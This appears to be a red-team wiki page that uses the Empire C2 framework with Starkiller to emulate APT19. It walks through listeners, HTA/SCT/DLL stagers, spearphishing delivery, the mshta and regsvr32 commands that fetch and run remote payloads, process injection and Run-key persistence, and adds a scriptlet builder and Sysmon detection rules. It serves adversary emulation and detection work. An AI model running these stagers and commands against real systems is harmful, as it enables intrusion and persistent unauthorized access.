# Empire3

A demo of Empire with Starkiller is in this [Red Team Village](https://redteamvillage.io/) event video, where I emulate APT19:

{% embed url="https://www.youtube.com/watch?v=KYCzakkmHqo" %}

## Install Empire

Install on Kali:

```
sudo apt install powershell-empire
```

Install on Ubuntu:

```
cd /opt
sudo git clone https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
```

If you are installing the newer version of Empire on the SANS Slingshot C2 Matrix Edition VM, `setup/install.sh` refuses to run: it expects Ubuntu 20.04, and Slingshot is built on 18.04. Two edits to `setup/install.sh` fix this. First, replace the Microsoft package repository line with the 18.04 package:

```
wget -q https://packages.microsoft.com/config/ubuntu/18.04/packages-microsoft-prod.deb
```

Then comment out the version test:

```bash
#if [ $VERSION_ID != "20.04" ]; then
#  echo -e '\x1b[1;31m[!] Ubuntu must be 20.04\x1b[0m' && exit
#fi
```

Download Starkiller if you want a GUI:

```
cd /opt
sudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImage
sudo chmod +x starkiller-1.0.0.AppImage
```

## Run Empire

```bash
sudo empire
```

On Kali:

```bash
sudo powershell-empire
```

## Run Starkiller

Start Empire with its REST API enabled so Starkiller can connect to it. The username and password you set here are the Starkiller login credentials (this is the Empire 3 syntax; Empire 4 and later split this into `empire server` and `empire client` and no longer accept `--rest`):

```bash
sudo empire --rest --username <user> --password <password>
```

Open Starkiller. The directory and file name must match the AppImage you downloaded; with the install commands above that is:

```bash
cd /opt
./starkiller-1.0.0.AppImage
```

Log in to Starkiller (port 1337 is the port Empire's REST API listens on):

* Name: localhost:1337
* Username: \<user>
* Password: \<password>

## Emulating TTPs

This walkthrough uses the SCYTHE adversary emulation plan for APT19 as an example: <https://www.scythe.io/library/threatthursday-apt19>. The sections below map each phase of the plan to the Empire listener, stager and modules used to reproduce it.

| Item                | Details                                                                                                                                                                                                                                                                            |
| ------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Description         | APT19 is a China-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.                                                                    |
| Goal and Intent     | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.                                                                                                                                                      |
| Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server                                                       |
| Initial Access      | Spearphishing attachment (T1193); Spearphishing link (T1192)                                                                                                                                                                                                                       |
| Execution           | PowerShell (T1086); User Execution; Hidden Window (T1143) - used `-W Hidden` to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073)   |
| Discovery           | System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016)                                                                                                                                                          |
| Persistence         | Registry Run Keys / Startup Folder (T1060) - establishes persistence by setting the Registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Debug Tools-%LOCALAPPDATA%\`                                                                                          |
| Defense Evasion     | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques                                                                                                                                                 |

The technique IDs are the ones used in the SCYTHE plan. Several of them have since been reorganised into sub-techniques in current ATT&CK (for example PowerShell T1086 is now T1059.001, spearphishing attachment/link T1193/T1192 are T1566.001/T1566.002, Run keys T1060 is T1547.001, Regsvr32 T1117 is T1218.010, and Hidden Window T1143 is T1564.003), so map them before loading this plan into a current ATT&CK Navigator layer.

### Listeners

Create an HTTP listener. The plan's C2 is plain HTTP over TCP port 80, so bind the listener there. Host and BindIP are this lab's Empire server address, and StagingKey is the shared key that protects the initial staging exchange (Empire generates a random one by default; the value below is only the one used in the demo):

```bash
Type: http
Name: http
Host: http://10.0.0.187
Port: 80
BindIP: 10.0.0.187
Jitter: 0.5
StagingKey: georgy
```

### Stagers

Generate the HTA stager (delivered by the spearphishing link; `Base64: True` gives the plan's base64-encoded PowerShell launcher):

```bash
Type: windows/hta
Listener: http
Base64: True
Language: powershell
Outfile: /tmp/Resume.hta
```

Generate the SCT stager (the scriptlet that regsvr32 will fetch in the Defense Evasion step; the output file name below is the one served later in this walkthrough):

```bash
Type: windows/launcher_sct
Listener: http
Base64: True
Language: powershell
OutFile: /tmp/launcher.sct
```

Generate the DLL stager for process injection. Arch must match the bitness of the process you inject into later; x86 is used here, so pick a 32-bit target process or regenerate with `Arch: x64`:

```bash
Type: windows/dll
Listener: http
Arch: x86
Language: powershell
OutFile: /tmp/launcher.dll

Optional Fields
Obfuscate: True
ObfuscateCommand: Token\String\1
```

The stagers are written to /tmp on the Empire server. Serve that directory over HTTP on port 8080 so the target can fetch them (`SimpleHTTPServer` is the Python 2 name of the same module):

```bash
cd /tmp
python3 -m http.server 8080
```
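What `Base64: True` produces, and how to get the command back out of a captured scriptlet, as an added example for this page (this is not Empire's code). Empire's real `launcher_sct` template differs in detail: the scriptlet built here is a constructed, generic regsvr32-scriptlet layout, the sample PowerShell command is benign, and the `-enc` decoding is the same UTF-16LE-then-base64 transform that PowerShell's `-EncodedCommand` expects. The functions `encode_powershell`, `build_sct` and `extract_launcher` are names chosen for this example.

```python
"""Encode a PowerShell launcher the way -EncodedCommand expects, wrap it in a
constructed regsvr32 scriptlet, and recover the script from such a file.

Added example; not Empire's own code. The scriptlet layout below mimics the
generic squiblydoo shape (an <scriptlet> whose JScript block runs PowerShell)
and is an assumption, not Empire's exact launcher_sct template.
"""
import base64
import re

# PowerShell -enc / -EncodedCommand takes base64 of the UTF-16LE script bytes,
# which is why these launchers are roughly twice the size of the plain script.
ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# "-w 1" / "-W Hidden" (WindowStyle) is the hidden-window trick in the APT19 plan.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Produce the argument that follows -enc for the given script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(b64: str) -> str:
    """Reverse encode_powershell (raises on bytes that are not UTF-16LE)."""
    return base64.b64decode(b64).decode("utf-16-le")


def build_sct(encoded: str) -> str:
    """Constructed scriptlet: regsvr32 /s /n /u /i:<url> scrobj.dll runs the
    <script> body, which spawns a hidden PowerShell with the encoded command.
    The progid/classid values are arbitrary placeholders."""
    return f"""<?XML version="1.0"?>
<scriptlet>
<registration progid="Example" classid="{{F0001111-0000-0000-0000-0000FEEDACDC}}">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell -noP -sta -w 1 -enc {encoded}", 0, false);
]]>
</script>
</registration>
</scriptlet>
"""


def extract_launcher(sct_text: str) -> dict:
    """Pull the encoded command out of a scriptlet and decode it.

    Regex rather than an XML parser on purpose: real .sct files open with
    '<?XML version="1.0"?>' (uppercase), which strict XML parsers reject.
    """
    m = ENC_RE.search(sct_text)
    if not m:
        raise ValueError("no encoded PowerShell command found in scriptlet")
    encoded = m.group(1)
    return {
        "encoded": encoded,
        "script": decode_powershell(encoded),
        "hidden_window": bool(HIDDEN_RE.search(sct_text)),
    }


if __name__ == "__main__":
    # Constructed, benign sample command standing in for the Empire stage-0 launcher.
    sample = build_sct(encode_powershell('Write-Output "hello from sct"'))
    info = extract_launcher(sample)
    print("hidden window:", info["hidden_window"])
    print("decoded script:", info["script"])
```

The same `extract_launcher` works on the body of an `.hta` file, since the HTA stager also embeds a `powershell ... -enc` command; the only difference is the surrounding markup.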

### Initial Access

Send a spearphishing email with a link to Resume.hta (the plan's Spearphishing link, T1192). Opening the link hands the HTA to mshta.exe on the target.

### Execution

What the phishing link triggers on the target, run by hand for the demo (mshta fetches and executes the remote HTA, which launches the hidden, base64-encoded PowerShell stager):

```bash
mshta http://10.0.0.187:8080/Resume.hta
```

Migrate to another process with reflective PE injection: <https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/>. List running processes from the agent with `ps`, pick a target PID whose bitness matches the DLL stager generated above (x86), then run the module:

```bash
ps
usemodule code_execution/invoke_reflectivepeinjection
set ProcId <processID>
set DllPath /tmp/launcher.dll
execute
```

### Discovery

Run discovery from the agent. `whoami` covers System Owner/User Discovery, and the host modules cover the plan's system and network information gathering:

```bash
whoami
usemodule situational_awareness/host/antivirusproduct
usemodule situational_awareness/host/get_uaclevel
usemodule situational_awareness/host/winenum
```

### Persistence

The userland registry module mirrors the plan's Run key persistence: it stores a launcher for the chosen listener under the current user's hive and adds a Run value that starts it at logon.

```bash
usemodule persistence/userland/registry
set Listener http
execute
```

Verify on the target by opening regedit at HKCU\Software\Microsoft\Windows\CurrentVersion and inspecting the new value under the Run key.

### Defense Evasion

Execution with regsvr32 and scripting (the "squiblydoo" technique): regsvr32 fetches the SCT scriptlet over HTTP and runs it through scrobj.dll, so no file has to be written to disk and application whitelisting of PowerShell scripts is sidestepped. For the demo, create a shortcut called Chrome with the Target set to:

```bash
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http://10.0.0.187:8080/launcher.sct scrobj.dll"
```

`/s` silences dialogs, `/n` skips DllRegisterServer, and `/u /i:<url>` passes the URL to scrobj.dll's DllInstall, which is what fetches and executes the scriptlet.
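Detection checks for the Execution, Persistence and Defense Evasion steps above, run over constructed Sysmon-style events, as an added example (not Empire's code and not a real log export). The field names follow Sysmon Event ID 1 (process creation: Image, ParentImage, CommandLine) and Event ID 13 (registry value set: TargetObject); the sample records, the rule names and the Run value name `Updater` are all constructed for this example.

```python
"""Rules for the TTPs in the APT19 plan, applied to constructed Sysmon-style
events: mshta fetching a remote HTA, hidden/encoded PowerShell spawned from a
script host, regsvr32 loading a remote scriptlet, and a new Run key value.

Added example; not Empire's code. SAMPLE_EVENTS are constructed, not captured.
"""
import re

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
# -enc/-EncodedCommand followed by a base64 blob (20+ chars rules out short flags)
ENC_RE = re.compile(r"\s-(?:enc|encodedcommand|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
# -w 1 / -W Hidden / -WindowStyle Hidden
HIDDEN_RE = re.compile(r"\s-w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
SCRIPT_HOSTS = ("mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe")


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list:
    """Rule names tripped by one Event ID 1 (process creation) record."""
    hits = []
    img = image_name(ev["Image"])
    cmd = ev["CommandLine"]
    low = cmd.lower()
    # HTA pulled from a remote host: the "mshta http://..." step above
    if img == "mshta.exe" and re.search(r"https?://", low):
        hits.append("mshta_remote_hta")
    # Squiblydoo: regsvr32 /i:<url> ... scrobj.dll (matches / or \ after the scheme)
    if img == "regsvr32.exe" and "scrobj.dll" in low and re.search(r"/i:https?:", low):
        hits.append("regsvr32_remote_scriptlet")
    if img in ("powershell.exe", "pwsh.exe"):
        # Empire launcher shape: hidden window plus encoded command
        if ENC_RE.search(cmd) and HIDDEN_RE.search(cmd):
            hits.append("powershell_hidden_encoded")
        # PowerShell spawned by a script host, as the HTA and SCT launchers do
        if image_name(ev.get("ParentImage", "")) in SCRIPT_HOSTS:
            hits.append("powershell_from_script_host")
    return hits


def check_registry(ev: dict) -> list:
    """Event ID 13: flag any new value under a Run key (the persistence step)."""
    if ev.get("EventType") == "SetValue" and RUN_KEY_RE.search(ev["TargetObject"]):
        return ["run_key_persistence"]
    return []


def scan(events: list) -> list:
    """Return (EventID, rule) pairs for every rule any event trips."""
    findings = []
    for ev in events:
        rules = check_registry(ev) if ev["EventID"] == 13 else check_process(ev)
        findings.extend((ev["EventID"], r) for r in rules)
    return findings


# Constructed sample events mirroring the walkthrough; the last one is benign.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://10.0.0.187:8080/Resume.hta"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc " + "A" * 40},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://10.0.0.187:8080/launcher.sct scrobj.dll"},
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
]


if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"EventID {event_id}: {rule}")
```

The rules key on what the stagers cannot easily change (a script host fetching a URL, scrobj.dll with `/i:http`, a Run value written by PowerShell) rather than on the stager text, so the `Obfuscate` option on the DLL stager or a different listener port does not change the result.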

### Upload

Push a tool to the target and run it. `upload` copies a file from the Empire server into the agent's current directory, and `shell` runs it through the agent:

```bash
cd C:\Users\<username>
upload /tmp/file
shell C:\Users\<username>\<executable>
```

## Other Resources

* Using Empire with Starkiller: [How to from BC-Security](https://www.bc-security.org/post/an-introduction-to-starkiller)
